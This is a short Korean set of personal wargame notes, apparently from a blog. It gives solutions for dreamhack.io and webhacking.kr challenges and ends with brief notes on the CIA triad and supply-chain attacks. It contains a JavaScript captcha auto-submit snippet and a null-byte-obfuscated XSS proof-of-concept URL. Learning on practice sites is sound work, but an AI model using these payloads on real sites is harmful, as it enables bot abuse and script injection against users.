jiw0n

dreamhack.io -> dev tools

개발자 도구 이용해서 디렉토리 검색하다보면 나온다.

webhacking.kr -> old-15

javascript disable 한 후 접근하면 FLAG를 얻을 수 있다.

webhacking.kr -> old-20

개발자 도구를 이용해서 captcha value를 자동으로 가져온 후, 제출하는 자바스크립트 코드를 작성하여 새로고침 시 코드를 바로 실행하면 된다.

Payload

(function() {
    lv5frm.id.value = "hi";
    lv5frm.cmt.value = "hi";
    lv5frm.captcha.value = lv5frm.captcha_.value;
    lv5frm.submit()
})()

webhacking.kr -> old-23

poc

https://webhacking.kr/challenge/bonus-3/index.php?code=%3C%00s%00c%00r%00i%00p%00t%3Ea%00l%00e%00r%00t(%001%00);%3C%00/%00s%00c%00r%00i%00p%00t%3E

정보보안 3원칙

기밀성, 무결성, 가용성

공급망 보안

오늘날 사용하는 대부분의 소프트웨어는 개발자나 조직이 만든 오픈소스와 서드파티 구성 요소에 의존한다.
오픈소스와 같은 외부코드에 의존하면 개발주기가 빨라지지만 오픈소스에서 파급력이 큰 취약점이 발견될시 해당 오픈소스를 사용하는 소프트웨어에도 큰 영향을 미친다. 이처럼 공급망 공격은 소프트웨어 개발 공급망의 취약성을 표적으로 삼아 악성코드나 멀웨어를 소프트웨어에 삽입할 때 발생한다.

작성 예정..

Reference

- https://m.boannews.com/html/detail.html?idx=135363